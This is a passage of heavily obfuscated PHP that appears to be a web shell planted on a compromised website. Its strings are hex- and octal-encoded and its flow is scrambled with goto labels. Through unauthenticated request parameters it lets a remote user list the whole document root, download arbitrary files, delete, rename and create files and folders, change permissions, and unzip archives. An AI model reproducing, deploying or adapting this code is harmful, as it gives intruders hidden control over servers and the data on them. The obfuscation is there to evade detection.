"\74\141\x20\164\x61\162\x67\145\164\75\x22\137\x62\x6c\x61\x6e\x6b\x22\x20\x68\x72\145\x66\75\x22\x68\164\164\x70\72\x2f\x2f{$real_url}\x22\76\117\x3c\x2f\x61\76\46\156\x62\x73\160\73" . "\x3c\x61\x20\150\x72\145\x66\75\42\x68\x74\x74\x70\x3a\x2f\57{$domain}{$script_path}\x3f\144\157\167\156\154\157\141\x64\x3d{$each}\x26\x64\151\162\x3d{$dr}\42\x3e\104\74\x2f\x61\76" . "\74\x2f\x74\x64\76\x3c\x2f\164\162\x3e"; } } if (file_exists($finderdata_path)) { unlink($finderdata_path); } if (file_exists($good_result_path)) { unlink($good_result_path); } } } } goto rftjs; iUuHB:
Root: goto gmR7i; odU8d: if (isset($_GET["\165\x6e\172\151\x70"])) { unzip_file($_GET["\165\156\172\x69\160"]); } goto K2tvA; AG8dt: echo $path_for_upload; goto ltHLW; wXTDj: function DirFilesR($dir) { $handle = opendir($dir) or die("\103\x61\156\x27\164\x20\x6f\x70\145\x6e\x20\x64\x69\x72\x65\x63\164\x6f\x72\171\40{$dir}"); $files = array(); $subfiles = array(); while (false !== ($file = readdir($handle))) { if ($file != "\56" && $file != "\x2e\x2e") { if (is_dir($dir . "\x2f" . $file)) { $subfiles = DirFilesR($dir . "\x2f" . $file); $files = array_merge($files, $subfiles); } else { $files[] = $dir . "\x2f" . $file; } } } closedir($handle); return $files; } goto zKFaU; pcOe2: $arr_path = explode("\57", $path); goto bBkyT; VJc5g: foreach ($arr_folder as $each) { if ($each !== "\x2e" and $each !== "\56\x2e") { if (isset($_GET["\144\151\x72"])) { $p = $_GET["\144\151\162"] . "\57" . $each; $next_dir = $_GET["\x64\x69\x72"] . "\57" . $each; } else { $p = $_SERVER["\104\117\103\125\x4d\105\x4e\x54\137\x52\117\x4f\124"] . "\57" . $each; $next_dir = $_SERVER["\x44\x4f\103\x55\115\x45\116\124\x5f\122\x4f\x4f\124"] . "\x2f" . $each; } $path_for_unlink = $next_dir; $for_del = strrchr($path_for_unlink, "\x2f"); $path_for_unlink = str_replace($for_del, '', $path_for_unlink); $time = get_time($p); if ($k % 2 == 0) { $color_bg = "\43\146\146\146\70\x65\x37"; } else { $color_bg = "\43\146\146\x66\x66\x65\60"; } echo "\x3c\164\x72\x20\142\147\143\x6f\x6c\x6f\162\x3d\42{$color_bg}\42\x20\x61\x6c\x69\147\156\75\42\x63\145\x6e\164\x65\162\x22\x3e\x3c\164\x64\40\141\154\151\147\x6e\75\42\154\x65\146\164\42\40\x3e" . "\74\146\x6f\x6e\x74\40\143\157\154\x6f\x72\75\42\x23\x39\x30\x34\144\63\x30\x22\x3e\x3c\x62\76\74\x61\40\x68\162\x65\146\x3d\x22\150\164\164\160\x3a\x2f\57{$domain}{$script_path}\77\x64\x69\162\x3d{$next_dir}\x22\76{$each}\x3c\x2f\141\x3e\74\x2f\x62\x3e\x3c\x2f\x66\x6f\x6e\164\76" . "\x3c\57\164\x64\76\74\x74\144\76\x64\x69\162\74\x2f\x74\144\x3e\x3c\x74\x64\x3e{$time}\74\57\x74\x64\76\74\164\144\76" . perms($p, "\x30") . "\74\57\x74\x64\x3e\74\164\x64\x3e" . "\x3c\x61\x20\150\162\x65\x66\x3d\42\x68\164\164\160\72\x2f\57{$domain}{$script_path}\x3f\x64\x65\x6c\75{$p}\46\x64\151\162\75{$path_for_unlink}\x22\76\x55\x3c\57\x61\76\x26\156\x62\x73\160\73" . "\x3c\x2f\x74\x64\76\74\x2f\x74\162\x3e"; $k++; } } goto HoRUI; ZJN2b: function folder_separate($path) { $pos_end = strripos($path, "\x2f"); $path2 = substr_replace($path, '', $pos_end, 99999); return $path2; } goto w44k4; swx35: if (isset($_GET["\144\x69\162"])) { $path_for_upload = $_SERVER["\x53\x43\x52\x49\120\x54\x5f\116\x41\x4d\x45"] . "\x3f\144\151\162\x3d" . $_GET["\144\x69\162"]; } else { $path_for_upload = $_SERVER["\x53\103\x52\111\x50\x54\137\116\x41\115\105"] . "\77\x64\151\x72\x3d" . $_SERVER["\104\x4f\x43\125\x4d\105\116\x54\137\x52\117\117\x54"]; } goto oh7Ou; L1goM: $permsself = perms($_SERVER["\x53\x43\122\111\x50\x54\x5f\x46\111\114\105\116\x41\x4d\x45"], ''); goto JPpj8; CYFAA: $domain = $_SERVER["\x53\x45\x52\x56\x45\122\x5f\x4e\x41\x4d\105"]; goto nry0o; OdL1t: function read_file($file_name) { $list = $file_name; if (file_exists($file_name) and filesize($file_name) > 1) { $file = fopen($list, "\x72\x74"); $arr_file = explode("\xa", fread($file, filesize($list))); fclose($file); return $arr_file; } else { $arr_file = array(); return $arr_file; } } goto bU592; l_Akv: $k = 0; goto VJc5g; qTBWq: if (!empty($_POST["\146\x6f\x72\137\x64\145\154"])) { $real_path_for_del = array(); $all_for_del = $_POST["\146\157\x72\x5f\144\x65\154"]; echo "\x3c\x3c\x69\156\146\x6f\76\x3e"; foreach ($all_for_del as $each) { $each = strstr($each, "\57"); $each = $_SERVER["\x44\117\x43\x55\x4d\105\116\x54\x5f\122\x4f\117\x54"] . "\x2f" . $each; $each_for_echo = str_replace($_SERVER["\x44\117\x43\x55\x4d\105\x4e\124\137\122\x4f\x4f\x54"], $_SERVER["\123\105\122\x56\x45\x52\x5f\116\101\115\105"], $each); if (file_exists($each)) { del_file($each); if (!file_exists($each)) { echo $each_for_echo . "\x20\55\40\x72\145\x6d\x6f\166\x65\144" . "\xa"; } else { echo $each_for_echo . "\40\55\x20\156\157\164\40\162\145\x6d\157\166\145\144" . "\12"; } } else { echo $each_for_echo . "\40\55\40\x6e\157\x74\x20\x66\x6f\165\156\x64" . "\12"; } } echo "\x3c\74\x2f\x69\x6e\146\x6f\76\x3e"; die; } goto hyepL; h7ORp: for ($i = 1; $i <= $slesh_count; $i++) { $k = $slesh_count - $i - 1; if ($i !== $slesh_count) { echo "\74\x61\x20\150\x72\145\x66\75\x22\x68\x74\164\160\x3a\x2f\57" . $domain . $script_path . "\77\144\151\162\75" . $arr_links["{$k}"] . "\42\76" . $arr_path["{$i}"] . "\x3c\57\141\x3e\x2f"; } else { echo "\74\x61\40\x68\162\x65\x66\x3d\x22\150\x74\x74\160\72\57\x2f" . $domain . $script_path . "\77\144\151\x72\75" . $path . "\42\x3e" . $arr_path["{$i}"] . "\74\x2f\141\76"; } } goto N8OVn; YkoXw: function findshells($start) { global $arr_filename; $files = array(); if (!($handle = opendir($start))) { chmod($start, 493); } $handle = opendir($start); while (($file = readdir($handle)) !== false) { if ($file != "\x2e" && $file != "\56\x2e") { $startfile = $start . "\x2f" . $file; if (is_dir($startfile)) { findshells($startfile); } else { $result = stristr($startfile, $_SERVER["\x53\103\x52\111\120\124\137\106\111\114\x45\116\101\x4d\x45"]); if ($result == false) { $arr_filename[] = $startfile; } } } } closedir($handle); return $arr_filename; } goto odU8d; bBkyT: $slesh_count = count($arr_path) - 1; goto XRkPj; QqCpE: echo CMS(); goto SVMV3; aPthd: function only_read($file_name) { if (file_exists($file_name) and filesize($file_name) > 1) { if (!($file = fopen($file_name, "\162\x74"))) { if (!chmod($file_name, 509)) { echo "\143\141\156\47\164\40\x70\x65\162\x6d\151\x73\x73\151\157\156\40\146\157\162\40\x63\x68\x6d\x6f\x64\x20\x66\x69\154\145\74\x62\x72\76"; $original_file = ''; } else { if (!($file = fopen($file_name, "\x72\x74"))) { echo "\143\x61\156\x27\x74\40\x70\x65\x72\x6d\x69\x73\x73\151\x6f\x6e\40\x66\x6f\162\x20\x6f\x70\x65\x6e\x20\x66\x69\154\x65\x3c\142\x72\76"; $original_file = ''; } else { $original_file = fread($file, filesize($file_name)); fclose($file); } } } else { $original_file = fread($file, filesize($file_name)); fclose($file); } } return $original_file; } goto YkoXw; w44k4: function side_bar($make_file) { echo "\74\x74\x64\40\x61\x6c\151\147\156\x3d\42\162\151\x67\150\x74\x22\x20\143\157\x6c\163\x70\141\x6e\75\42\62\42\76"; echo "\x3c\x66\x6f\162\x6d\40\x61\143\x74\x69\x6f\x6e\x20\x3d\40\x27" . $make_file . "\x27\40\155\145\164\x68\x6f\x64\40\75\40\47\x50\x4f\123\124\47\x3e"; echo "\x3c\151\156\160\165\x74\x20\x6e\x61\x6d\x65\x3d\42\x73\145\141\x72\143\150\x5f\x66\151\154\x65\42\40\163\151\x7a\145\x3d\42\x37\42\x20\x74\171\x70\145\75\42\x74\145\170\164\42\40\160\154\x61\143\x65\150\x6f\154\144\145\162\x3d\42\56\163\x75\x73\160\145\x63\164\145\144\x22\40\x2f\76"; echo "\74\x69\156\160\x75\164\x20\x74\171\160\x65\x3d\x22\x73\165\x62\155\x69\164\42\x20\x76\141\154\x75\145\75\x22\157\153\x22\40\57\76\74\57\x66\157\162\x6d\76"; echo "\x3c\x66\x6f\162\x6d\x20\x61\x63\x74\151\157\x6e\x20\75\40\47" . $make_file . "\x27\x20\155\145\164\x68\157\144\40\75\x20\x27\x50\x4f\x53\x54\x27\76"; echo "\x3c\x69\x6e\160\165\164\40\156\x61\x6d\x65\x3d\x22\x6e\145\x77\137\x66\x69\154\x65\x22\40\163\151\x7a\145\75\x22\x37\x22\40\x74\x79\160\145\x3d\x22\x74\145\170\164\x22\x20\x70\x6c\141\x63\145\150\x6f\154\144\145\x72\x3d\x22\155\141\x6b\145\x20\146\x69\x6c\x65\42\x20\57\76"; echo "\x3c\x69\156\x70\x75\x74\40\164\171\160\145\x3d\42\x73\x75\x62\155\x69\x74\42\x20\x76\x61\154\165\145\75\42\x6f\x6b\42\x20\57\76\74\x2f\146\x6f\162\155\76"; echo "\74\x66\x6f\162\155\40\141\x63\x74\x69\x6f\x6e\40\75\x20\x27" . $make_file . "\x27\x20\x6d\145\164\150\157\144\40\75\x20\47\120\117\x53\x54\47\x3e"; echo "\74\x69\156\160\165\164\x20\156\141\x6d\x65\x3d\x22\156\145\x77\137\144\x69\162\x22\x20\x73\x69\x7a\x65\x3d\x22\x37\42\40\164\x79\160\145\x3d\42\164\x65\170\164\x22\x20\x70\154\x61\x63\145\x68\157\154\x64\145\x72\75\x22\x6d\141\x6b\145\40\x64\x69\162\x22\x20\57\76"; echo "\x3c\x69\156\x70\165\164\x20\x74\171\160\145\75\42\x73\x75\142\x6d\151\x74\x22\x20\x76\141\x6c\165\145\x3d\x22\157\153\42\x20\x2f\x3e\74\x2f\146\157\x72\x6d\x3e"; echo "\74\x2f\164\x64\x3e\74\57\164\162\76"; } goto u4OBc; Lvj3c: if (isset($_GET["\x64\x69\162"])) { $path = $_GET["\144\x69\162"]; } else { $path = $_SERVER["\104\x4f\x43\125\115\x45\x4e\x54\137\x52\x4f\117\x54"]; } goto pcOe2; zKFaU: if (isset($_GET["\x6a\x75\153\x65"])) { $arr_files = DirFilesR($_SERVER["\x44\117\103\x55\115\105\x4e\124\137\122\x4f\x4f\124"]); echo "\74\x74\144\x3e\x3c\x68\162\76\x3c\150\x72\x3e"; foreach ($arr_files as $key) { $key_e = str_replace($_SERVER["\x44\x4f\x43\x55\115\105\x4e\124\137\122\117\117\x54"], $_SERVER["\123\x45\x52\126\x45\122\137\x4e\101\x4d\x45"], $key); echo $key_e . "\x3b" . filesize($key) . "\x3c\x62\x72\x3e\12"; } echo "\74\150\x72\76\74\150\162\76\74\x2f\x74\x64\x3e"; die; } goto hJ3CK; fDCi6: function get_filesize($file) { if (!file_exists($file)) { return "\320\244\320\260\320\xb9\xd0\xbb\x20\40\xd0\xbd\xd0\265\x20\xd0\275\320\xb0\xd0\271\320\xb4\320\xb5\320\xbd"; } $filesize = filesize($file); if ($filesize > 1024) { $filesize = $filesize / 1024; if ($filesize > 1024) { $filesize = $filesize / 1024; if ($filesize > 1024) { $filesize = $filesize / 1024; $filesize = round($filesize, 1); return $filesize . "\40\147\x62"; } else { $filesize = round($filesize, 1); return $filesize . "\x20\x6d\142"; } } else { $filesize = round($filesize, 1); return $filesize . "\40\153\142"; } } else { $filesize = round($filesize, 1); return $filesize . "\x20\x62"; } } goto UWbec; N8OVn:
goto p1Drj; rftjs: if (isset($_GET["\x64\x6f\167\156\154\x6f\141\144"])) { $file_for_save = $_GET["\144\157\x77\156\154\x6f\x61\x64"]; if (file_exists($file_for_save)) { header("\x43\157\x6e\x74\x65\x6e\x74\x2d\104\x65\163\143\162\151\160\x74\151\x6f\156\72\40\x46\x69\x6c\145\x20\x54\162\x61\x6e\x73\x66\x65\162"); header("\x43\157\156\164\145\x6e\164\x2d\124\171\x70\x65\x3a\x20\x61\x70\160\x6c\x69\143\x61\164\x69\x6f\x6e\x2f\x6f\x63\164\x65\x74\x2d\x73\x74\x72\145\x61\x6d"); header("\x43\x6f\156\164\145\156\x74\55\104\151\163\160\157\163\x69\164\x69\x6f\x6e\72\40\141\x74\164\x61\143\150\155\x65\x6e\x74\73\40\x66\x69\x6c\145\156\141\x6d\145\75" . basename($file_for_save)); header("\x43\x6f\156\x74\145\156\x74\x2d\124\162\141\x6e\163\146\145\162\55\105\x6e\143\x6f\x64\151\156\x67\x3a\x20\142\x69\156\141\x72\171"); header("\x45\170\x70\x69\162\145\x73\72\x20\x30"); header("\x43\141\143\x68\x65\55\x43\157\x6e\x74\x72\157\x6c\x3a\x20\x6d\165\163\x74\x2d\162\145\x76\x61\x6c\151\x64\x61\164\x65"); header("\120\162\141\x67\x6d\141\x3a\40\160\165\142\154\x69\143"); header("\103\157\x6e\x74\145\x6e\164\55\114\x65\x6e\x67\x74\x68\72\x20" . filesize($file_for_save)); readfile($_GET["\144\x6f\167\156\x6c\x6f\141\x64"]); die; } } goto fDCi6; oh7Ou:
<form action=" goto AG8dt; Bx4B0: echo $_SERVER["\123\103\122\111\x50\x54\x5f\106\x49\x4c\x45\x4e\x41\x4d\x45"]; goto GkeUr; u4OBc: if (isset($_GET["\x72\x65\156\141\x6d\x65"])) { if (!empty($_POST["\x6e\137\156\x61\155\x65"])) { if (rename($_GET["\x72\x65\156\x61\155\145"], $_POST["\156\x5f\x6e\141\155\x65"])) { $message_rename = "\74\146\x6f\x6e\164\40\x63\157\x6c\157\162\x3d\42\147\162\145\x65\x6e\42\x3e\x3c\x62\x3e\x4e\141\155\x65\x20\x63\x68\x61\156\147\145\x64\x21\74\57\x62\x3e\74\57\146\157\156\x74\x3e"; } else { $message_rename = "\x3c\146\157\x6e\164\x20\143\x6f\154\x6f\162\75\x22\162\145\x64\42\76\74\x62\x3e\x4e\141\155\x65\40\x63\141\156\40\156\x6f\164\x20\x62\145\40\143\x68\x61\156\x67\x65\144\x3c\x2f\x62\x3e\74\57\146\x6f\156\164\76"; } echo $message_rename; } } goto GNZ40; HoRUI: foreach ($arr_filenames as $each) { if (isset($_GET["\144\x69\162"])) { $p = $_GET["\144\151\162"] . "\x2f" . $each; $dr = $_GET["\x64\151\162"]; } else { $p = $_SERVER["\x44\117\x43\x55\x4d\x45\x4e\124\x5f\x52\117\x4f\x54"] . "\57" . $each; $dr = $_SERVER["\x44\117\103\125\x4d\x45\116\x54\137\122\117\117\x54"]; } $time = get_time($p); $real_url = str_replace($_SERVER["\104\x4f\x43\125\x4d\105\116\124\x5f\x52\117\x4f\124"], $_SERVER["\x53\105\122\x56\x45\122\137\116\101\x4d\x45"], $p); if ($k % 2 == 0) { $color_bg = "\x23\146\x66\146\70\145\67"; } else { $color_bg = "\43\x66\x66\x66\146\x65\x30"; } $per = stristr($each, "\x2e\x7a\x69\x70"); if ($per !== false) { $per = "\x3c\x61\40\x68\x72\x65\x66\x3d\42\150\x74\x74\x70\72\57\x2f{$domain}{$script_path}\77\165\156\172\x69\160\x3d{$p}\46\144\x69\162\75{$dr}\x22\x3e\x5a\x3c\57\141\76\46\156\142\163\160\x3b"; } else { $per = "\x3c\141\40\150\162\x65\x66\75\42\150\x74\164\x70\x3a\57\x2f{$domain}{$script_path}\x3f\x65\x64\x69\x74\75{$p}\46\x64\151\x72\75{$dr}\42\x3e\105\74\x2f\x61\76\x26\156\x62\x73\x70\73"; } echo "\74\164\x72\x20\x62\x67\x63\157\154\x6f\162\x3d\x22{$color_bg}\42\40\141\154\x69\x67\156\75\42\x63\145\x6e\x74\145\162\x22\x3e\x3c\164\x64\x20\x61\x6c\x69\x67\156\75\42\x6c\145\x66\164\42\x20\76" . "\x3c\x61\x20\163\164\x79\154\145\x3d\x22\164\145\170\x74\x2d\144\x65\x63\157\x72\x61\164\x69\x6f\x6e\x3a\40\156\157\156\x65\x3b\42\x20\150\162\145\x66\x3d\42\x68\164\x74\x70\72\57\57{$domain}{$script_path}\x3f\x65\144\151\x74\75{$p}\x26\144\x69\162\75{$dr}\x22\x3e\x3c\x66\157\156\x74\40\x63\x6f\x6c\157\x72\75\42\142\x6c\x61\143\153\42\x3e{$each}\x3c\x2f\146\157\156\x74\76\74\57\141\x3e" . "\x3c\57\164\x64\76\74\164\144\x3e" . get_filesize($p) . "\x3c\x2f\164\144\76\x3c\x74\144\x3e{$time}\74\57\x74\144\76\74\164\x64\x3e" . perms($p, "\60") . "\x3c\x2f\x74\x64\x3e\74\164\x64\x3e" . "\x3c\x61\x20\150\162\145\146\x3d\x22\x68\164\164\x70\x3a\x2f\57{$domain}{$script_path}\77\144\145\x6c\x3d{$p}\x26\144\x69\x72\x3d{$dr}\42\x3e\x55\x3c\x2f\x61\76\46\x6e\142\163\160\73" . $per . "\74\141\40\164\141\162\x67\145\164\x3d\x22\137\x62\154\x61\156\x6b\42\x20\150\x72\x65\146\75\x22\x68\x74\164\x70\x3a\57\57{$real_url}\x22\76\x4f\x3c\57\141\76\46\x6e\x62\x73\x70\x3b" . "\74\x61\x20\150\162\x65\146\x3d\x22\x68\164\x74\x70\72\57\57{$domain}{$script_path}\77\x64\157\x77\x6e\154\x6f\x61\144\75{$p}\46\144\x69\162\75{$dr}\x22\76\104\74\x2f\141\76" . "\x3c\x2f\164\x64\x3e\x3c\x2f\x74\162\76"; $k++; } goto OUAju; PxSrw: foreach ($arr_files as $each) { $str_for_search = $each; if (isset($_GET["\x64\x69\162"])) { $str_for_search = $_GET["\x64\x69\162"] . "\57" . $each; } else { $str_for_search = $_SERVER["\x44\117\103\x55\115\105\x4e\x54\x5f\x52\117\x4f\x54"] . "\57" . $each; } if (is_dir($str_for_search)) { $arr_folder[] = $each; } else { $arr_filenames[] = $each; } } goto l_Akv; GkeUr:
</title><style type="text/css">INPUT[type=text]{background-color:#fff8e7}body{background:#fff8e7;color:#4c5866;font-family:Verdana;font-size:11px}a:link{color:#3c9}a:visited{color:#3c9}a:hover{text-decoration:none;Color:#39f}table{font-size:11px}td{padding:1px;padding-left:10px;padding-right:10px;padding-top:2px}</style><table cellpadding="5"width="80%"> goto L1goM; nry0o: $script_path = $_SERVER["\x53\x43\122\111\120\x54\137\x4e\101\x4d\105"]; goto cHx6x; hJ3CK:
<title> goto Bx4B0; nAIB7: if (empty($_POST["\x6e\145\x77\x5f\x66\151\154\x65"]) and empty($_POST["\163\145\141\162\x63\150\x5f\x66\151\154\x65"]) and empty($_POST["\156\x65\167\x5f\144\151\x72"])) { if (isset($_GET["\x64\x69\x72"])) { $path = $_GET["\144\151\162"]; } else { $path = $_SERVER["\x44\x4f\103\x55\x4d\105\116\124\137\122\117\x4f\124"]; } $make_file = "\150\164\x74\x70\72\x2f\57" . $domain . $script_path . "\x3f\x64\x69\162\75" . $path; side_bar($make_file); } elseif (!empty($_POST["\x6e\x65\x77\137\x66\151\x6c\145"])) { if (isset($_GET["\144\x69\162"])) { $path = $_GET["\x64\151\162"] . "\x2f" . $_POST["\x6e\145\167\x5f\x66\x69\x6c\x65"]; } else { $path = $_SERVER["\104\x4f\103\125\115\105\x4e\x54\137\122\x4f\x4f\124"] . "\57" . $_POST["\x6e\x65\x77\x5f\146\151\x6c\145"]; } $make_file = "\x68\x74\x74\x70\x3a\57\57" . $domain . $script_path . "\x3f\x64\151\162\75" . $_GET["\x64\x69\162"] . "\x26\x65\x64\x69\164\x3d" . $path; if ($fp = fopen($path, "\167")) { echo "\74\x66\157\x6e\164\40\143\157\154\157\x72\x3d\x22\x67\x72\x65\x65\x6e\x22\76\106\x69\x6c\x65\x20\x63\x72\145\141\x74\145\144\x20\163\x75\143\x63\x65\163\163\146\165\154\154\x79\41\x3c\57\x66\157\x6e\164\76"; side_bar($make_file); } else { echo "\x3c\x66\x6f\156\164\40\143\157\x6c\157\162\x3d\x22\x72\145\144\x22\x3e\x43\141\x6e\x20\x6e\x6f\x74\x20\x63\162\145\141\x74\x65\41\74\x2f\146\x6f\x6e\x74\x3e"; side_bar($make_file); } fclose($fp); } elseif (!empty($_POST["\156\145\x77\137\144\x69\162"])) { if (isset($_GET["\144\151\x72"])) { $path = $_GET["\144\151\x72"] . "\x2f" . $_POST["\156\145\167\x5f\144\x69\162"]; } else { $path = $_SERVER["\104\117\x43\125\115\x45\x4e\x54\x5f\x52\117\117\x54"] . "\x2f" . $_POST["\x6e\x65\x77\137\144\151\162"]; } $make_file = "\150\x74\164\160\72\57\57" . $domain . $script_path . "\77\144\151\x72\75" . $_GET["\144\151\162"] . "\46\x6e\145\167\137\144\x69\162\x3d" . $path; if ($fp = mkdir($path)) { side_bar($make_file); echo "\x3c\x74\162\x20\141\x6c\151\x67\156\x3d\x22\143\x65\x6e\164\145\162\42\76\74\164\x64\x20\141\154\x69\147\156\x3d\x22\x6c\145\146\164\x22\40\x3e" . "\74\x66\157\x6e\x74\x20\x63\x6f\x6c\157\162\x3d\42\147\162\145\x65\156\42\x3e\x46\x6f\x6c\x64\145\x72\40\143\162\x65\x61\x74\x65\144\40\x73\165\143\x63\145\163\163\x66\165\x6c\x6c\171\x21\74\57\146\x6f\x6e\164\x3e\x3c\57\164\144\76" . "\x3c\x74\x64\76\74\x2f\164\x64\x3e\x3c\164\144\76\x3c\x2f\164\144\76\74\x74\144\76\74\x2f\x74\144\76\x3c\164\144\x3e\x3c\57\164\144\x3e\x3c\57\x74\x72\76"; } else { side_bar($make_file); echo "\74\x74\x72\x20\x61\x6c\151\147\x6e\75\42\143\145\x6e\164\x65\x72\x22\x3e\x3c\164\x64\x20\141\154\x69\147\156\x3d\42\x6c\x65\x66\164\42\40\x3e" . "\74\146\x6f\156\x74\x20\x63\x6f\154\x6f\x72\x3d\x22\x72\145\144\42\76\103\141\156\40\x6e\x6f\164\40\x63\x72\145\141\x74\x65\40\146\157\154\x64\145\x72\41\x3c\x2f\x66\x6f\156\164\76\74\57\164\144\76" . "\74\164\x64\x3e\74\57\164\144\x3e\x3c\x74\144\x3e\74\x2f\x74\144\x3e\x3c\x74\x64\x3e\74\57\164\x64\x3e\x3c\x74\x64\x3e\74\57\164\144\76\74\57\164\162\76"; } } elseif (!empty($_POST["\x73\x65\x61\162\x63\x68\x5f\146\151\x6c\x65"])) { $file_name_for_search = $_POST["\x73\145\x61\x72\x63\x68\x5f\x66\x69\x6c\145"]; $arr_all_filenames = findshells($_SERVER["\104\x4f\x43\125\115\x45\x4e\124\x5f\122\x4f\117\124"]); if (isset($_GET["\x64\151\x72"])) { $dr = $_GET["\x64\x69\162"]; } else { $dr = $_SERVER["\104\x4f\x43\125\115\105\x4e\x54\137\122\117\117\124"]; } side_bar($make_file); foreach ($arr_all_filenames as $each_file_name) { $result = stristr($each_file_name, $file_name_for_search); if ($result !== false) { $time = get_time($each_file_name); $real_url = str_replace($_SERVER["\x44\x4f\x43\125\115\105\116\124\137\x52\117\117\124"], $_SERVER["\x53\105\122\126\x45\x52\x5f\116\x41\115\105"], $each_file_name); echo "\x3c\164\162\40\x62\x67\x63\x6f\x6c\157\x72\75\42\x23\146\x66\146\146\146\146\42\40\x61\x6c\151\x67\x6e\75\42\x63\145\x6e\164\145\x72\42\76\74\164\x64\40\x61\x6c\151\x67\x6e\x3d\x22\x6c\x65\146\164\42\x20\76" . "\x3c\x61\x20\163\164\x79\x6c\x65\75\x22\164\145\170\164\55\144\x65\x63\157\x72\x61\x74\151\157\156\72\40\x6e\157\156\x65\x3b\x22\40\x68\x72\x65\146\x3d\x22\x68\164\164\x70\72\x2f\x2f{$domain}{$script_path}\77\x65\144\x69\x74\75{$each_file_name}\46\x64\x69\162\75{$dr}\42\x3e\x3c\x66\157\156\x74\x20\143\x6f\154\x6f\162\75\42\x62\x6c\141\143\153\42\x3e{$each_file_name}\x3c\57\146\157\156\x74\76\x3c\57\141\76" . "\x3c\57\164\144\x3e\x3c\x74\x64\x3e" . get_filesize($each_file_name) . "\74\57\164\144\76\74\x74\x64\76{$time}\x3c\x2f\164\x64\76\x3c\x74\x64\x3e" . perms($each_file_name, "\x30") . "\x3c\x2f\x74\144\76\74\x74\x64\x3e" . "\x3c\141\40\150\x72\145\x66\x3d\42\x68\164\164\x70\x3a\x2f\x2f{$domain}{$script_path}\77\144\145\154\75{$each_file_name}\46\144\151\162\x3d{$dr}\x22\76\x55\74\x2f\x61\76\x26\156\x62\x73\x70\73" . "\74\x61\x20\150\x72\x65\146\75\42\150\164\164\160\72\x2f\x2f{$domain}{$script_path}\x3f\145\144\151\164\x3d{$each_file_name}\46\x64\151\162\x3d{$dr}\42\x3e\105\x3c\x2f\141\76\46\x6e\142\163\160\73" . "\74\141\40\x74\x61\162\147\x65\164\75\x22\137\142\154\141\156\153\42\x20\150\x72\145\x66\x3d\x22\150\164\x74\160\72\57\x2f{$real_url}\42\x3e\117\x3c\x2f\141\76\46\x6e\142\x73\x70\73" . "\74\141\x20\150\162\x65\146\75\x22\x68\x74\164\160\72\x2f\x2f{$domain}{$script_path}\77\144\x6f\x77\156\154\x6f\141\144\75{$each_file_name}\x26\x64\151\x72\x3d{$dr}\42\x3e\104\74\x2f\141\x3e" . "\74\57\164\144\76\x3c\x2f\x74\162\x3e"; } } } goto NW4Fw; OUAju: